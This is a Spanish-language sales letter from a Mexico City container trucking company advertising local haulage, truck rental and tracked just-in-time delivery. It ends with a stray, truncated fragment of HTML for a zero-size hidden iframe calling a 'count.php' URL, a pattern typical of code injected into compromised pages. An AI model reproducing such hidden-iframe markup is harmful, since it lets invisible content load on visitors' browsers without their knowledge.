En estos tiempos nos estamos enfrentando a un periodo de desarrollo y cambios significativos. Ante el crecimiento del mercado y la realización total del tratado de libre comercio, se verá aumentado el intercambio comercial y compañías como la suya necesitara superar su sistema de transporte de mercancías en México, D.F.

Por tal motivo Transportes Rápidos de AMSA, S.A. de C.V. con 28 años de experiencia en el traslado de contenedores dentro del área metropolitana y zonas conurbanas ( Servicio Local ), ya sea para importaciones o exportaciones; le ofrece una gama de servicios para atender a todas sus necesidades de distribución y a sus prioridades de envíos. Contamos además, si Ud. lo desea con renta de tractocamiones para realizar sus servicios de transporte y así satisfacer su logística de distribución dentro de su empresa.

Ud. puede estar totalmente confiado que su mercancía llegara a su destino sin ninguna demora, ya que Transportes Rápidos de AMSA, S.A. de C.V. es líder en realizar el servicio Justo a Tiempo.

Contamos con una excelente labor de entrega a domicilio y cada una de nuestras unidades cuenta con asistencia de comunicación para saber exactamente su ubicación, y así poder rastrear su mercancía en cualquier momento.

Nuestra misión es que Ud. pueda contar con un servicio confiable y seguro.

Nuestro objetivo es que su empresa quede complacida con nuestra función ya que Transportes Rápidos de AMSA, S.A. de C.V. se ha distinguido en brindar rapidez y un excelente servicio de transporte y entrega.


ount.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>/d